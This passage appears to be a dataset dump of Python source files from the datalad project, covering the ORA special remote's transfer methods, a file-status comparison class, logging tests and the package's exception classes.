now also READ IO is done with the write IO\n # this explicitly ignores the remote config\n # that distinguishes READ from WRITE with different\n # methods\n self._io = self._push_io\n if hasattr(self.io, 'close'):\n register(self.io.close)\n\n self.storage_host = self.storage_host_push\n self.store_base_path = self.store_base_path_push\n\n # delete/update cached locations:\n self._last_archive_path = None\n self._last_keypath = (None, None)\n\n store_base_path = (\n url_path2local_path(self.store_base_path)\n if self._local_io\n else self.store_base_path)\n\n self.remote_git_dir, \\\n self.remote_archive_dir, \\\n self.remote_obj_dir = \\\n self.get_layout_locations(store_base_path, self.archive_id)\n\n else:\n # no push-url: use existing IO\n self._push_io = self._io\n\n return self._push_io\n\n @handle_errors\n def prepare(self):\n\n gitdir = self.annex.getgitdir()\n self._repo = AnnexRepo(gitdir)\n self._verify_config()\n\n self.get_store()\n\n # report active special remote configuration/status\n self.info = {\n 'store_base_path': str(self.store_base_path),\n 'storage_host': 'local'\n if self._local_io() else self.storage_host,\n }\n\n # TODO: following prob. needs hasattr instead:\n if not isinstance(self.io, HTTPRemoteIO):\n self.info['7z'] = (\"not \" if not self.io.get_7z() else \"\") + \\\n \"available\"\n\n @handle_errors\n def transfer_store(self, key, filename):\n self._ensure_writeable()\n\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n key_path = dsobj_dir / key_path\n\n if self.push_io.exists(key_path):\n # if the key is here, we trust that the content is in sync\n # with the key\n return\n\n self.push_io.mkdir(key_path.parent)\n\n # We need to copy to a temp location to let checkpresent fail while the\n # transfer is still in progress and furthermore not interfere with\n # administrative tasks in annex/objects.\n # In addition include uuid, to not interfere with parallel uploads from\n # different clones.\n transfer_dir = \\\n self.remote_git_dir / \"ora-remote-{}\".format(self._repo.uuid) / \"transfer\"\n self.push_io.mkdir(transfer_dir)\n tmp_path = transfer_dir / key\n\n try:\n self.push_io.put(filename, tmp_path, self.annex.progress)\n # copy done, atomic rename to actual target\n self.push_io.rename(tmp_path, key_path)\n except Exception as e:\n # whatever went wrong, we don't want to leave the transfer location\n # blocked\n self.push_io.remove(tmp_path)\n raise e\n\n @handle_errors\n def transfer_retrieve(self, key, filename):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n abs_key_path = dsobj_dir / key_path\n # sadly we have no idea what type of source gave checkpresent->true\n # we can either repeat the checks, or just make two opportunistic\n # attempts (at most)\n try:\n self.io.get(abs_key_path, filename, self.annex.progress)\n except Exception as e1:\n if isinstance(self.io, HTTPRemoteIO):\n # no client-side archive access over HTTP\n # Note: This is intentional, as it would mean one additional\n # request per key. However, server response to the GET can\n # consider archives on their end.\n raise\n # catch anything and keep it around for a potential re-raise\n try:\n self.io.get_from_archive(archive_path, key_path, filename,\n self.annex.progress)\n except Exception as e2:\n # TODO properly report the causes\n raise RIARemoteError('Failed to obtain key: {}'\n ''.format([str(e1), str(e2)]))\n\n @handle_errors\n def checkpresent(self, key):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n abs_key_path = dsobj_dir / key_path\n if self.io.exists(abs_key_path):\n # we have an actual file for this key\n return True\n if isinstance(self.io, HTTPRemoteIO):\n # no client-side archive access over HTTP\n return False\n # do not make a careful check whether an archive exists, because at\n # present this requires an additional SSH call for remote operations\n # which may be rather slow. Instead just try to run 7z on it and let\n # it fail if no archive is around\n # TODO honor future 'archive-mode' flag\n return self.io.in_archive(archive_path, key_path)\n\n @handle_errors\n def remove(self, key):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n self._ensure_writeable()\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n key_path = dsobj_dir / key_path\n if self.push_io.exists(key_path):\n self.push_io.remove(key_path)\n key_dir = key_path\n # remove at most two levels of empty directories\n for level in range(2):\n key_dir = key_dir.parent\n try:\n self.push_io.remove_dir(key_dir)\n except Exception:\n break\n\n @handle_errors\n def getcost(self):\n # 100 is cheap, 200 is expensive (all relative to Config/Cost.hs)\n # 100/200 are the defaults for local and remote operations in\n # git-annex\n # if we have the object tree locally, operations are cheap (100)\n # otherwise expensive (200)\n return '100' if self._local_io() else '200'\n\n @handle_errors\n def whereis(self, key):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n if isinstance(self.io, HTTPRemoteIO):\n # display the URL for a request\n # TODO: method of HTTPRemoteIO\n # in case of a HTTP remote (unchecked for others), storage_host\n # is not just a host, but a full URL without a path\n return f'{self.storage_host}{dsobj_dir}/{key_path}'\n\n return str(dsobj_dir / key_path) if self._local_io() \\\n else '{}: {}:{}'.format(\n self.storage_host,\n self.remote_git_dir,\n sh_quote(str(key_path)),\n )\n\n @staticmethod\n def get_layout_locations(base_path, dsid):\n return get_layout_locations(1, base_path, dsid)\n\n def _get_obj_location(self, key):\n # Notes: - Changes to this method may require an update of\n # ORARemote._layout_version\n # - archive_path is always the same ATM. However, it might depend\n # on `key` in the future. Therefore build the actual filename\n # for the archive herein as opposed to `get_layout_locations`.\n\n if not self._last_archive_path:\n self._last_archive_path = self.remote_archive_dir / 'archive.7z'\n if self._last_keypath[0] != key:\n if self.remote_object_tree_version == '1':\n key_dir = self.annex.dirhash_lower(key)\n\n # If we didn't recognize the remote layout version, we set to\n # read-only and promised to at least try and read according to our\n # current version. So, treat that case as if remote version was our\n # (client's) version.\n else:\n key_dir = self.annex.dirhash(key)\n # double 'key' is not a mistake, but needed to achieve the exact\n # same layout as the annex/objects tree\n self._last_keypath = (key, Path(key_dir) / key / key)\n\n return self.remote_obj_dir, self._last_archive_path, \\\n self._last_keypath[1]\n\n # TODO: implement method 'error'\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=ORARemote,\n remote_name='ora',\n description=\\\n \"transport file content to and from datasets hosted in RIA stores\",\n )\n" }, { "alpha_fraction": 0.562841534614563, "alphanum_fraction": 0.564943253993988, "avg_line_length": 32.507041931152344, "blob_id": "1ea6caf3667b6d26fcab3daaf741915d28ac8894", "content_id": "dcd042967eb6d6604fda54e51dcfe763f89ad460", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2379, "license_type": "permissive", "max_line_length": 87, "num_lines": 71, "path": "/datalad/support/status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"(comparable) descriptors of the file status\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom ..utils import auto_repr\n\n\n@auto_repr\nclass FileStatus(object):\n \"\"\"Description of the file status to e.g. check if newer version is available\n\n \"\"\"\n\n def __init__(self, size=None, mtime=None, filename=None):\n self.size = size\n self.mtime = mtime\n # TODO: actually not sure if filename should be here!\n self.filename = filename\n\n def __eq__(self, other):\n # If other is still None, we must be different\n if not other:\n return False\n # Disallow comparison of empty ones\n if self.size is None and self.mtime is None: # and self.filename is None:\n return NotImplemented\n if other.size is None and other.mtime is None: # and other.filename is None:\n return NotImplemented\n\n same = \\\n self.size == other.size # and \\\n #self.filename == other.filename\n if not same:\n return False\n\n # now deal with time.\n\n # TODO: provide a config option for mtime comparison precision\n # we might want to claim times equal up to a second precision\n # since e.g. some file systems do not even store sub-sec timing\n # TODO: config crawl.mtime_delta\n\n # if any of them int and another float -- we need to trim float to int\n if self.mtime == other.mtime:\n return True\n elif self.mtime is None or other.mtime is None:\n return False\n\n # none is None if here and not equal exactly\n if isinstance(self.mtime, int) or isinstance(other.mtime, int):\n return int(self.mtime) == int(other.mtime)\n return False\n\n def __ne__(self, other):\n out = self == other\n if isinstance(out, bool):\n return not out\n elif out is NotImplemented:\n return out\n else:\n raise RuntimeError(\"Unknown return %r\" % (out,))\n" }, { "alpha_fraction": 0.6158432960510254, "alphanum_fraction": 0.6264297962188721, "avg_line_length": 32.4065055847168, "blob_id": "0f95e07b8a7557c500b80f59ba74e39ed5183780", "content_id": "6f8cfd7a5710430ec102bb932e5fd5b3a9d4a3da", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8220, "license_type": "permissive", "max_line_length": 92, "num_lines": 246, "path": "/datalad/tests/test_log.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test logging facilities \"\"\"\n\nimport inspect\nimport logging\nimport os.path\nfrom logging import makeLogRecord\nfrom os.path import exists\nfrom unittest.mock import patch\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.log import (\n ColorFormatter,\n LoggerHelper,\n TraceBack,\n log_progress,\n with_progress,\n with_result_progress,\n)\nfrom datalad.support import ansi_colors as colors\nfrom datalad.support.constraints import EnsureBool\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_in,\n assert_no_open_files,\n assert_not_in,\n assert_re_in,\n known_failure_githubci_win,\n ok_,\n ok_endswith,\n ok_generator,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import on_windows\n\n\n# pretend we are in interactive mode so we could check if coloring is\n# disabled\n@patch(\"datalad.log.is_interactive\", lambda: True)\n@with_tempfile\ndef test_logging_to_a_file(dst=None):\n ok_(not exists(dst))\n\n lgr = LoggerHelper(\"dataladtest-1\").get_initialized_logger(logtarget=dst)\n ok_(exists(dst)) # nothing was logged -- no file created\n\n msg = \"Oh my god, they killed Kenny\"\n lgr.error(msg)\n with open(dst) as f:\n lines = f.readlines()\n assert_equal(len(lines), 1, \"Read more than a single log line: %s\" % lines)\n line = lines[0]\n ok_(msg in line)\n ok_('\\033[' not in line,\n msg=\"There should be no color formatting in log files. Got: %s\" % line)\n # verify that time stamp and level are present in the log line\n # do not want to rely on not having race conditions around date/time changes\n # so matching just with regexp\n # (...)? is added to swallow possible traceback logs\n regex = r\"\\[ERROR\\]\"\n if EnsureBool()(dl_cfg.get('datalad.log.timestamp', False)):\n regex = r\"\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2},\\d{3} \" + regex\n if EnsureBool()(dl_cfg.get('datalad.log.vmem', False)):\n regex += r' RSS/VMS: \\S+/\\S+( \\S+)?\\s*'\n regex += r\"(\\s+\\S+\\s*)? \" + msg\n assert_re_in(regex, line, match=True)\n\n # Python's logger is ok (although not documented as supported) to accept\n # non-string messages, which could be str()'ed. We should not puke\n msg2 = \"Kenny is alive\"\n lgr.error(RuntimeError(msg2))\n with open(dst) as f:\n assert_in(msg2, f.read())\n\n # Close all handlers so windows is happy -- apparently not closed fast enough\n for handler in lgr.handlers:\n handler.close()\n assert_no_open_files(dst)\n\n\n@with_tempfile\ndef test_logtarget_via_env_variable(dst=None):\n with patch.dict('os.environ', {'DATALADTEST_LOG_TARGET': dst}):\n ok_(not exists(dst))\n lgr = LoggerHelper(\"dataladtest-2\").get_initialized_logger()\n ok_(not exists(dst))\n # just to see that mocking patch worked\n ok_('DATALADTEST_LOG_TARGET' not in os.environ)\n\n\n@with_tempfile\n@with_tempfile\ndef test_mutliple_targets(dst1=None, dst2=None):\n ok_(not exists(dst1))\n ok_(not exists(dst2))\n lgr = LoggerHelper(\"dataladtest-3\").get_initialized_logger(\n logtarget=\"%s,%s\" % (dst1, dst2))\n ok_(exists(dst1))\n ok_(exists(dst2))\n\n msg = \"Oh my god, they killed Kenny\"\n lgr.error(msg)\n for dst in (dst1, dst2):\n with open(dst) as f:\n lines = f.readlines()\n assert_equal(len(lines), 1, \"Read more than a single log line: %s\" % lines)\n ok_(msg in lines[0])\n # Close all handlers so windows is happy -- apparently not closed fast enough\n for handler in lgr.handlers:\n handler.close()\n\n\ndef check_filters(name):\n with swallow_logs(new_level=logging.DEBUG, name=name) as cml:\n lgr1 = logging.getLogger(name + '.goodone')\n lgr2 = logging.getLogger(name + '.anotherone')\n lgr3 = logging.getLogger(name + '.bad')\n lgr1.debug('log1')\n lgr2.info('log2')\n lgr3.info('log3')\n assert_in('log1', cml.out)\n assert_in('log2', cml.out)\n assert_not_in('log3', cml.out)\n\n\ndef test_filters():\n def _mock_names(self, v, d=None):\n return 'datalad1.goodone,datalad1.anotherone' if v == 'names' else d\n with patch.object(LoggerHelper, '_get_config', _mock_names):\n LoggerHelper('datalad1').get_initialized_logger()\n check_filters('datalad1')\n\n def _mock_namesre(self, v, d=None):\n return 'datalad.*one' if v == 'namesre' else d\n with patch.object(LoggerHelper, '_get_config', _mock_namesre):\n LoggerHelper('datalad2').get_initialized_logger()\n check_filters('datalad2')\n\n\ndef test_traceback():\n from inspect import (\n currentframe,\n getframeinfo,\n )\n\n # do not move lines below among themselves -- we rely on consistent line numbers ;)\n tb_line = getframeinfo(currentframe()).lineno + 2\n def rec(tb, n):\n return rec(tb, n-1) if n else tb()\n tb1 = rec(TraceBack(), 10)\n ok_endswith(tb1, \">test_log:%d,%s\" % (tb_line + 1, \",\".join([str(tb_line)]*10)))\n\n # we limit to the last 100\n tb1 = rec(TraceBack(collide=True), 110)\n ok_endswith(tb1, \"…>test_log:%s\" % (\",\".join([str(tb_line)]*100)))\n\n\n@known_failure_githubci_win\ndef test_color_formatter():\n\n # want to make sure that coloring doesn't get \"stuck\"\n for use_color in False, True, False:\n # we can't reuse the same object since it gets colored etc inplace\n rec = makeLogRecord(\n dict(msg='very long message',\n levelname='DEBUG',\n name='some name'))\n\n cf = ColorFormatter(use_color=use_color)\n if on_windows:\n raise SkipTest('Unclear under which conditions coloring should work')\n (assert_in if use_color else assert_not_in)(colors.RESET_SEQ, cf.format(rec))\n\n\n# TODO: somehow test is stdout/stderr get their stuff\n\n\n@patch(\"datalad.log.is_interactive\", lambda: False)\ndef test_log_progress_noninteractive_filter():\n name = \"dl-test\"\n lgr = LoggerHelper(name).get_initialized_logger()\n pbar_id = \"lp_test\"\n with swallow_logs(new_level=logging.INFO, name=name) as cml:\n log_progress(lgr.info, pbar_id, \"Start\", label=\"testing\", total=3)\n log_progress(lgr.info, pbar_id, \"THERE0\", update=1)\n log_progress(lgr.info, pbar_id, \"NOT\", update=1,\n noninteractive_level=logging.DEBUG)\n log_progress(lgr.info, pbar_id, \"THERE1\", update=1,\n noninteractive_level=logging.INFO)\n log_progress(lgr.info, pbar_id, \"Done\")\n for present in [\"Start\", \"THERE0\", \"THERE1\", \"Done\"]:\n assert_in(present, cml.out)\n assert_not_in(\"NOT\", cml.out)\n\n\ndef test_with_result_progress_generator():\n # Tests ability for the decorator to decorate a regular function\n # or a generator function (then it returns a generator function)\n\n @with_result_progress\n def func(l):\n return l\n\n generated = []\n @with_result_progress\n def gen(l):\n for i in l:\n generated.append(i)\n yield i\n\n recs = [{'status': 'ok', 'unrelated': i} for i in range(2)]\n # still works for a func and returns provided list\n ok_(not inspect.isgeneratorfunction(func))\n assert_equal(func(recs), recs)\n\n # generator should still yield and next iteration should only happen\n # when requested\n ok_(inspect.isgeneratorfunction(gen))\n g = gen(recs)\n\n ok_generator(g)\n assert_equal(generated, []) # nothing yet\n assert_equal(next(g), recs[0])\n assert_equal(generated, recs[:1])\n assert_equal(next(g), recs[1])\n assert_equal(generated, recs)\n\n # just to make sure all good to redo\n assert_equal(list(gen(recs)), recs)\n\n\ndef test_with_progress_generator():\n # Well, we could also pass an iterable directly now and display\n # progress iterative over it\n g = with_progress(range(3))\n ok_generator(g)\n assert_equal(list(g), list(range(3)))\n" }, { "alpha_fraction": 0.6254647970199585, "alphanum_fraction": 0.6262615323066711, "avg_line_length": 29.61138153076172, "blob_id": "4e2e230301499fd674edcf2680866a1a0a48669f", "content_id": "32b4ea19f1522caa1727e67f5b3683d38a5aa6fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18826, "license_type": "permissive", "max_line_length": 96, "num_lines": 615, "path": "/datalad/support/exceptions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\" datalad exceptions\n\"\"\"\n\nimport logging\nimport re\nimport traceback\nfrom os import linesep\nfrom pathlib import Path\nfrom pprint import pformat\n\nfrom datalad.runner.exception import CommandError\n\nlgr = logging.getLogger('datalad.support.exceptions')\n\n\nclass CapturedException(object):\n \"\"\"This class represents information about an occurred exception (including\n its traceback), while not holding any references to the actual exception\n object or its traceback, frame references, etc.\n\n Just keep the textual information for logging or whatever other kind of\n reporting.\n \"\"\"\n\n def __init__(self, exc, limit=None, capture_locals=False,\n level=8, logger=None):\n \"\"\"Capture an exception and its traceback for logging.\n\n Clears the exception's traceback frame references afterwards.\n\n Parameters\n ----------\n exc: Exception\n limit: int\n Note, that this is limiting the capturing of the exception's\n traceback depth. Formatting for output comes with it's own limit.\n capture_locals: bool\n Whether or not to capture the local context of traceback frames.\n \"\"\"\n # Note, that with lookup_lines=False the lookup is deferred,\n # not disabled. Unclear to me ATM, whether that means to keep frame\n # references around, but prob. not. TODO: Test that.\n self.tb = traceback.TracebackException.from_exception(\n exc,\n limit=limit,\n lookup_lines=True,\n capture_locals=capture_locals\n )\n traceback.clear_frames(exc.__traceback__)\n\n # log the captured exception\n logger = logger or lgr\n logger.log(level, \"%r\", self)\n\n def format_oneline_tb(self, limit=None, include_str=True):\n \"\"\"Format an exception traceback as a one-line summary\n\n Returns a string of the form [filename:contextname:linenumber, ...].\n If include_str is True (default), this is prepended with the string\n representation of the exception.\n \"\"\"\n return format_oneline_tb(\n self, self.tb, limit=limit, include_str=include_str)\n\n def format_standard(self):\n \"\"\"Returns python's standard formatted traceback output\n\n Returns\n -------\n str\n \"\"\"\n # TODO: Intended for introducing a decent debug mode later when this\n # can be used from within log formatter / result renderer.\n # For now: a one-liner is free\n return ''.join(self.tb.format())\n\n def format_short(self):\n \"\"\"Returns a short representation of the original exception\n\n Form: ExceptionName(exception message)\n\n Returns\n -------\n str\n \"\"\"\n return self.name + '(' + self.message + ')'\n\n def format_with_cause(self):\n \"\"\"Returns a representation of the original exception including the\n underlying causes\"\"\"\n\n return format_exception_with_cause(self.tb)\n\n @property\n def message(self):\n \"\"\"Returns only the message of the original exception\n\n Returns\n -------\n str\n \"\"\"\n return str(self.tb)\n\n @property\n def name(self):\n \"\"\"Returns the class name of the original exception\n\n Returns\n -------\n str\n \"\"\"\n return self.tb.exc_type.__qualname__\n\n def __str__(self):\n return self.format_short()\n\n def __repr__(self):\n return self.format_oneline_tb(limit=None, include_str=True)\n\n\ndef format_oneline_tb(exc, tb=None, limit=None, include_str=True):\n \"\"\"Format an exception traceback as a one-line summary\n\n Parameters\n ----------\n exc: Exception\n tb: TracebackException, optional\n If not given, it is generated from the given exception.\n limit: int, optional\n Traceback depth limit. If not given, the config setting\n 'datalad.exc.str.tblimit' will be used, or all entries\n are reported.\n include_str: bool\n If set, is True (default), the return value is prepended with a string\n representation of the exception.\n\n Returns\n -------\n str\n Of format [filename:contextname:linenumber, ...].\n \"\"\"\n\n # Note: No import at module level, since ConfigManager imports\n # dochelpers -> circular import when creating datalad.cfg instance at\n # startup.\n from datalad import cfg\n\n if include_str:\n # try exc message else exception type\n leading = exc.message or exc.name\n out = \"{} \".format(leading)\n else:\n out = \"\"\n\n if tb is None:\n tb = traceback.TracebackException.from_exception(\n exc,\n limit=limit,\n lookup_lines=True,\n capture_locals=False,\n )\n\n entries = []\n entries.extend(tb.stack)\n if tb.__cause__:\n entries.extend(tb.__cause__.stack)\n elif tb.__context__ and not tb.__suppress_context__:\n entries.extend(tb.__context__.stack)\n\n if limit is None:\n limit = int(cfg.obtain('datalad.exc.str.tblimit',\n default=len(entries)))\n if entries:\n tb_str = \"[%s]\" % (','.join(\n \"{}:{}:{}\".format(\n Path(frame_summary.filename).name,\n frame_summary.name,\n frame_summary.lineno)\n for frame_summary in entries[-limit:])\n )\n out += \"{}\".format(tb_str)\n\n return out\n\n\ndef format_exception_with_cause(e):\n \"\"\"Helper to recursively format an exception with all underlying causes\n\n For each exception in the chain either the str() of it is taken, or the\n class name of the exception, with the aim to generate a simple and\n comprehensible description that can be used in user-facing messages.\n It is explicitly not aiming to provide a detailed/comprehensive source\n of information for in-depth debugging.\n\n '-caused by-' is used a separator between exceptions to be human-readable\n while being recognizably different from potential exception payload\n messages.\n \"\"\"\n s = str(e) or \\\n (e.exc_type.__name__ if isinstance(e, traceback.TracebackException)\n else e.__class__.__name__)\n exc_cause = getattr(e, '__cause__', None)\n if exc_cause:\n s += f' -caused by- {format_exception_with_cause(exc_cause)}'\n return s\n\n\nclass MissingExternalDependency(RuntimeError):\n \"\"\"External dependency is missing error\"\"\"\n\n def __init__(self, name, ver=None, msg=\"\"):\n super(MissingExternalDependency, self).__init__()\n self.name = name\n self.ver = ver\n self.msg = msg\n\n def __str__(self):\n to_str = 'No working {} installation'.format(self.name)\n if self.ver:\n to_str += \" of version >= %s\" % self.ver\n to_str += \".\"\n if self.msg:\n to_str += \" %s\" % self.msg\n return to_str\n\n\nclass BrokenExternalDependency(RuntimeError):\n \"\"\"Some particular functionality is broken with this dependency.\"\"\"\n\n\nclass DeprecatedError(RuntimeError):\n \"\"\"To raise whenever a deprecated entirely feature is used\"\"\"\n def __init__(self, new=None, version=None, msg=''):\n \"\"\"\n\n Parameters\n ----------\n new : str, optional\n What new construct to use\n version : str, optional\n Since which version is deprecated\n kwargs\n \"\"\"\n super(DeprecatedError, self).__init__()\n self.version = version\n self.new = new\n self.msg = msg\n\n def __str__(self):\n s = self.msg if self.msg else ''\n if self.version:\n s += (\" is deprecated\" if s else \"Deprecated\") + \" since version %s.\" % self.version\n if self.new:\n s += \" Use %s instead.\" % self.new\n return s\n\n\nclass OutdatedExternalDependency(MissingExternalDependency):\n \"\"\"External dependency is present but outdated\"\"\"\n\n def __init__(self, name, ver=None, ver_present=None, msg=\"\"):\n super(OutdatedExternalDependency, self).__init__(name, ver=ver, msg=msg)\n self.ver_present = ver_present\n\n def __str__(self):\n to_str = super(OutdatedExternalDependency, self).__str__()\n # MissingExternalDependency ends with a period unless msg is\n # given, in which case it's up to the msg and no callers in\n # our code base currently give a msg ending with a period.\n to_str += \".\" if self.msg else \"\"\n to_str += \" You have version %s\" % self.ver_present \\\n if self.ver_present else \\\n \" Some unknown version of dependency found.\"\n return to_str\n\n\nclass AnnexBatchCommandError(CommandError):\n \"\"\"Thrown if a batched command to annex fails\n\n \"\"\"\n pass\n\n\nclass CommandNotAvailableError(CommandError):\n \"\"\"Thrown if a command is not available due to certain circumstances.\n \"\"\"\n pass\n\n\nclass FileNotInAnnexError(IOError, CommandError):\n \"\"\"Thrown if a file is not under control of git-annex.\n \"\"\"\n def __init__(self, cmd=\"\", msg=\"\", code=None, filename=\"\"):\n CommandError.__init__(self, cmd=cmd, msg=msg, code=code)\n IOError.__init__(self, code, \"%s: %s\" % (cmd, msg), filename)\n\n def to_str(self, include_output=True):\n return \"%s\\n%s\" % (\n CommandError.to_str(self, include_output=include_output),\n IOError.__str__(self))\n\n\nclass FileInGitError(FileNotInAnnexError):\n \"\"\"Thrown if a file is not under control of git-annex, but git itself.\n \"\"\"\n pass\n\n\nclass FileNotInRepositoryError(FileNotInAnnexError):\n \"\"\"Thrown if a file is not under control of the repository at all.\n \"\"\"\n pass\n\n\nclass InvalidGitReferenceError(ValueError):\n \"\"\"Thrown if provided git reference is invalid\n \"\"\"\n def __init__(self, ref, *args, **kwargs):\n super(InvalidGitReferenceError, self).__init__(*args, **kwargs)\n self.ref = ref\n\n def __str__(self):\n return u\"Git reference '{}' invalid\".format(self.ref)\n\n\nclass GitIgnoreError(CommandError):\n \"\"\"Thrown if a path was ignored by a git command due to .gitignore file\n\n Note, that this might be thrown to indicate what was ignored, while the\n actual operation was partially successful (regarding paths, not in .gitignore)\n\n Note/Todo:\n in case of a directory being ignored, git returns that directory as the\n ignored path, even if a path within that directory was passed to the command.\n That means, that in such cases the returned path might not match an item you\n passed!\n \"\"\"\n\n pattern = \\\n re.compile(r'ignored by one of your .gitignore files:\\s*(.*)'\n r'^(?:hint: )?Use -f.*$',\n flags=re.MULTILINE | re.DOTALL)\n\n def __init__(self, cmd=\"\", msg=\"\", code=None, stdout=\"\", stderr=\"\",\n paths=None):\n super(GitIgnoreError, self).__init__(\n cmd=cmd, msg=msg, code=code, stdout=stdout, stderr=stderr)\n self.paths = paths\n\n def to_str(self, include_output=True):\n # Override CommandError.to_str(), ignoring include_output.\n return self.msg\n\n\nclass PathOutsideRepositoryError(Exception):\n \"\"\"Thrown if a path points outside the repository that was requested to\n deal with that path.\"\"\"\n\n # TODO: use it in GitRepo/AnnexRepo!\n def __init__(self, file_, repo):\n self.file_ = file_\n self.repo = repo\n\n def __str__(self):\n return \"path {0} not within repository {1}\".format(self.file_, self.repo)\n\n\nclass PathKnownToRepositoryError(Exception):\n \"\"\"Thrown if file/path is under Git control, and attempted operation\n must not be ran\"\"\"\n pass\n\n\nclass GitError(Exception):\n \"\"\" Base class for all package exceptions \"\"\"\n\n\nclass NoSuchPathError(GitError, OSError):\n \"\"\" Thrown if a path could not be access by the system. \"\"\"\n\n\nclass MissingBranchError(Exception):\n \"\"\"Thrown if accessing a repository's branch, that is not available\"\"\"\n\n def __init__(self, repo, branch, available_branches=None, msg=None):\n self.repo = repo\n self.branch = branch\n self.branches = available_branches\n if msg is None:\n self.msg = \"branch '{0}' missing in {1}.\" \\\n \"\".format(self.branch, self.repo)\n if self.branches:\n self.msg += \" Available branches: {0}\".format(self.branches)\n else:\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass InsufficientArgumentsError(ValueError):\n \"\"\"To be raise instead of `ValueError` when use help output is desired\"\"\"\n pass\n\n\nclass NoDatasetArgumentFound(InsufficientArgumentsError):\n \"\"\"To be raised when expecting having a dataset but none was provided\"\"\"\n pass\n\n\nclass NoDatasetFound(NoDatasetArgumentFound):\n \"\"\"Raised whenever a dataset is required, but none could be determined\"\"\"\n pass\n\n\nclass OutOfSpaceError(CommandError):\n \"\"\"To be raised whenever a command fails if we have no sufficient space\n\n Example is annex get command\n \"\"\"\n\n def __init__(self, sizemore_msg=None, **kwargs):\n super(OutOfSpaceError, self).__init__(**kwargs)\n self.sizemore_msg = sizemore_msg\n\n def to_str(self, include_output=True):\n super_str = super().to_str(\n include_output=include_output).rstrip(linesep + '.')\n return \"%s needs %s more\" % (super_str, self.sizemore_msg)\n\n\nclass RemoteNotAvailableError(CommandError):\n \"\"\"To be raised whenever a required remote is not available\n\n Example is \"annex get somefile --from=MyRemote\",\n where 'MyRemote' doesn't exist.\n \"\"\"\n\n def __init__(self, remote, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n remote: str\n name of the remote\n kwargs:\n arguments from CommandError\n \"\"\"\n super(RemoteNotAvailableError, self).__init__(**kwargs)\n self.remote = remote\n\n def to_str(self, include_output=True):\n super_str = super().to_str(include_output=include_output)\n return \"Remote '{0}' is not available. Command failed:{1}{2}\" \\\n \"\".format(self.remote, linesep, super_str)\n\n\nclass InvalidInstanceRequestError(RuntimeError):\n \"\"\"Thrown if a request to create a (flyweight) instance is invalid\"\"\"\n\n def __init__(self, id_, msg=None):\n super(InvalidInstanceRequestError, self).__init__(msg)\n self.id = id_\n self.msg = msg\n\n\nclass InvalidGitRepositoryError(GitError):\n \"\"\" Thrown if the given repository appears to have an invalid format. \"\"\"\n\n\nclass InvalidAnnexRepositoryError(RuntimeError):\n \"\"\"Thrown if AnnexRepo was instantiated on a non-annex and\n without init=True\"\"\"\n\n\nclass DirectModeNoLongerSupportedError(NotImplementedError):\n \"\"\"direct mode is no longer supported\"\"\"\n\n def __init__(self, repo, msg=None):\n super(DirectModeNoLongerSupportedError, self).__init__(\n ((\" \" + msg + \", but \") if msg else '')\n +\n \"direct mode of operation is being deprecated in git-annex and \"\n \"no longer supported by DataLad. \"\n \"Please use 'git annex upgrade' under %s to upgrade your direct \"\n \"mode repository to annex v6 (or later).\" % repo.path\n )\n self.repo = repo # might come handy\n\n\nclass IncompleteResultsError(RuntimeError):\n \"\"\"Exception to be raised whenever results are incomplete.\n\n Any results produced nevertheless are to be passed as `results`,\n and become available via the `results` attribute.\n \"\"\"\n # TODO passing completed results doesn't fit in a generator paradigm\n # such results have been yielded already at the time this exception is\n # raised, little point in collecting them just for the sake of a possible\n # exception\n # MIH+YOH: AnnexRepo.copy_to and @eval_results are the last\n # remaining user of this functionality.\n # General use (as in AnnexRepo) of it discouraged but use in @eval_results\n # is warranted\n def __init__(self, results=None, failed=None, msg=None):\n super(IncompleteResultsError, self).__init__(msg)\n self.results = results\n self.failed = failed\n\n def __str__(self):\n super_str = super(IncompleteResultsError, 